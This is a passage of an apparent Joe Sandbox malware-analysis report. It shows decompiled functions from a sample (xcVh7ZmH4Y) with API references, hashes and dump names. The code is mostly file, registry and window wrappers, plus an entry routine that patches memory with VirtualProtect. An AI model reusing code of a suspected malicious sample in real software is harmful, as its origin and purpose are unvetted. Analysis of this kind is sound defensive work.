                                                                                      Function 004060DF Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E004060DF(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                      0x004060e3
                                                                                      0x004060f3
                                                                                      0x004060fb
                                                                                      0x00000000
                                                                                      0x00406102
                                                                                      0x00000000
                                                                                      0x00406104

                                                                                      APIs
                                                                                      • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403498,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 004060F3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite
                                                                                      • String ID:
                                                                                      • API String ID: 3934441357-0
                                                                                      • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                      • Instruction ID: d8d859634201a592f38c73999a999f352708a9e59580de02994c407fa40ca669
                                                                                      • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                      • Instruction Fuzzy Hash: FAE08C3220026AABEF109E60DC04AEB3B6CFB00360F014837FA16E7081E270E93087A4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004060B0 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E004060B0(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                      0x004060b4
                                                                                      0x004060c4
                                                                                      0x004060cc
                                                                                      0x00000000
                                                                                      0x004060d3
                                                                                      0x00000000
                                                                                      0x004060d5

                                                                                      APIs
                                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E2,00000000,00000000,00403306,000000FF,00000004,00000000,00000000,00000000), ref: 004060C4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileRead
                                                                                      • String ID:
                                                                                      • API String ID: 2738559852-0
                                                                                      • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                      • Instruction ID: 1583d2e05e1cff28e3594e7db3f0db2d88eef65457287744bb544c492d9958e5
                                                                                      • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                      • Instruction Fuzzy Hash: AEE0EC322502AAABDF10AE65DC04AEB7B6CEB05361F018936FD16E6150E631E92197A4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 71032A7F Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x71035048 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x7103505c, 4, 0x40, 0x7103504c); // executed
					 *0x7103505c = 0xc2;
					 *0x7103504c = 0;
					 *0x71035054 = 0;
					 *0x71035068 = 0;
					 *0x71035058 = 0;
					 *0x71035050 = 0;
					 *0x71035060 = 0;
					 *0x7103505e = 0;
				}
				return 1;
			}



                                                                                      0x71032a88
                                                                                      0x71032a8d
                                                                                      0x71032a9d
                                                                                      0x71032aa5
                                                                                      0x71032aac
                                                                                      0x71032ab1
                                                                                      0x71032ab6
                                                                                      0x71032abb
                                                                                      0x71032ac0
                                                                                      0x71032ac5
                                                                                      0x71032aca
                                                                                      0x71032aca
                                                                                      0x71032ad2

                                                                                      APIs
                                                                                      • VirtualProtect.KERNEL32(7103505C,00000004,00000040,7103504C), ref: 71032A9D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26231651771.0000000071031000.00000020.00000001.01000000.00000004.sdmp, Offset: 71030000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26231597486.0000000071030000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26231722184.0000000071034000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26231774806.0000000071036000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_71030000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: ProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 544645111-0
                                                                                      • Opcode ID: c7f5f06b415d4d046998abb21e69e2f22ff742ef684708f277434d832006b71a
                                                                                      • Instruction ID: 2f03d67d085fd96758be24d5c9347eb06ca50dbc58108155ddbcbc8c83cf27a5
                                                                                      • Opcode Fuzzy Hash: c7f5f06b415d4d046998abb21e69e2f22ff742ef684708f277434d832006b71a
                                                                                      • Instruction Fuzzy Hash: F5F09BB2A0C280DEC351CF2B8884709BFF0B74A604B64496EF288DA260E3374048CF91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004063AA Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E004063AA(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406329(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}






                                                                                      0x004063b4
                                                                                      0x004063bb
                                                                                      0x004063ce
                                                                                      0x00000000
                                                                                      0x004063ce
                                                                                      0x004063bf
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406438,?,00000000,?,?,Call,?), ref: 004063CE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: Open
                                                                                      • String ID:
                                                                                      • API String ID: 71445658-0
                                                                                      • Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                      • Instruction ID: 4361357c0318622cec318f667d88df30c4c29b75262f7bca7234b06b46464da2
                                                                                      • Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                      • Instruction Fuzzy Hash: 83D0123210020EBBDF115F91AD01FAB3B5DAB08310F014426FE06E40A1D775D530A764
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004044E5 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E004044E5(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x433ed8;
				if(_t2 != 0) {
					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}





                                                                                      0x004044e5
                                                                                      0x004044ec
                                                                                      0x004044f7
                                                                                      0x00000000
                                                                                      0x004044f7
                                                                                      0x004044fd

                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
                                                                                      • Instruction ID: 729772cd993a62bf3dcd5a53f5ba0c6067f9c4589e443fe2cdcdd0dddf41cb53
                                                                                      • Opcode Fuzzy Hash: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
                                                                                      • Instruction Fuzzy Hash: 74C04CB1740605BADA108B509D45F0677546750701F188429B641A50E0CA74E410D62C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004044CE Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E004044CE(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x434f08, 0x28, _a4, 1); // executed
				return _t2;
			}




                                                                                      0x004044dc
                                                                                      0x004044e2

                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                                                                      • Instruction ID: f9270ce27bc2d5d500308faa7c43699bdd9cec228278350af1c7ef3a72e6c056
                                                                                      • Opcode Fuzzy Hash: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                                                                      • Instruction Fuzzy Hash: 4FB01235181A00FBDE514B00DE09F857E62F7E4701F058038F341240F0CBB200A4DB08
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004034E5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E004034E5(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                                                                      0x004034f3
                                                                                      0x004034f9

                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040387D,?), ref: 004034F3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: FilePointer
                                                                                      • String ID:
                                                                                      • API String ID: 973152223-0
                                                                                      • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                      • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                                      • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                      • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004044BB Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E004044BB(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x42d264, _a4); // executed
				return _t2;
			}




                                                                                      0x004044c5
                                                                                      0x004044cb

                                                                                      APIs
                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00404292), ref: 004044C5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: CallbackDispatcherUser
                                                                                      • String ID:
                                                                                      • API String ID: 2492992576-0
                                                                                      • Opcode ID: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
                                                                                      • Instruction ID: 0db23a64e3c973129ccb7351ad80e5cfa0365495cc8a336c35755b545d17f2be
                                                                                      • Opcode Fuzzy Hash: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
                                                                                      • Instruction Fuzzy Hash: 74A00275508601DBDE115B51DF09D057B71A7547017414579A18551034C6314461EB5D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E004014D7(intOrPtr __edx) {
				long _t3;
				void* _t7;
				intOrPtr _t10;
				void* _t13;

				_t10 = __edx;
				_t3 = E00402D84(_t7);
				 *((intOrPtr*)(_t13 - 0x10)) = _t10;
				if(_t3 <= 1) {
					_t3 = 1;
				}
				Sleep(_t3); // executed
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t13 - 4));
				return 0;
			}







                                                                                      0x004014d7
                                                                                      0x004014d8
                                                                                      0x004014e1
                                                                                      0x004014e4
                                                                                      0x004014e8
                                                                                      0x004014e8
                                                                                      0x004014ea
                                                                                      0x00402c2d
                                                                                      0x00402c39

                                                                                      APIs
                                                                                      • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: Sleep
                                                                                      • String ID:
                                                                                      • API String ID: 3472027048-0
                                                                                      • Opcode ID: e3bcad73e1de128994d288fa0b6ef38954c80a91edb21965763d280816065a30
                                                                                      • Instruction ID: 7e4bd3fa72896d3e54e8b4d9ea8ddceac118c8145159a7c2ee745a60f6c60e84
                                                                                      • Opcode Fuzzy Hash: e3bcad73e1de128994d288fa0b6ef38954c80a91edb21965763d280816065a30
                                                                                      • Instruction Fuzzy Hash: 8DD0A773B141018BD704EBFCFE8545E73E8EB503293208C37D402E10D1E678C846461C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 710312BB Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E710312BB() {
				void* _t3;

				_t3 = GlobalAlloc(0x40,  *0x7103506c +  *0x7103506c); // executed
				return _t3;
			}




                                                                                      0x710312c5
                                                                                      0x710312cb

                                                                                      APIs
                                                                                      • GlobalAlloc.KERNEL32(00000040,?,710312DB,?,7103137F,00000019,710311CA,-000000A0), ref: 710312C5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26231651771.0000000071031000.00000020.00000001.01000000.00000004.sdmp, Offset: 71030000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26231597486.0000000071030000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26231722184.0000000071034000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26231774806.0000000071036000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_71030000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocGlobal
                                                                                      • String ID:
                                                                                      • API String ID: 3761449716-0
                                                                                      • Opcode ID: be16f682f83095161ca458f1c2ce8b9a2561eb828f579fca1898545860ebbaa9
                                                                                      • Instruction ID: 7f54304bb0ab899e2ffe5c69b22da4d69ea15357eb0c5a336e541775d14bbff0
                                                                                      • Opcode Fuzzy Hash: be16f682f83095161ca458f1c2ce8b9a2561eb828f579fca1898545860ebbaa9
                                                                                      • Instruction Fuzzy Hash: D7B01272B08000DFEE008B65CC0AF347664E700301F144004F600C4180C17348108734
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Non-executed Functions

                                                                                      Function 0040498A Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 78%
                                                                                      			E0040498A(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x42c240; // 0x7d1fcc
				_v32 = _t82;
				_t2 = _t82 + 0x3c; // 0x0
				_t3 = _t82 + 0x38; // 0x0
				_t146 = ( *_t2 << 0xb) + L"ppingA";
				_v12 =  *_t3;
				if(_a8 == 0x40b) {
					E00405B81(0x3fb, _t146);
					E004067C4(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405B81(0x3fb, _t146);
							if(E00405F14(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E0040653D(0x42b238, _t146);
							_t87 = E0040690A(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E0040653D(0x42b238, _t146);
								_t89 = E00405EB7(0x42b238);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x42b238,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
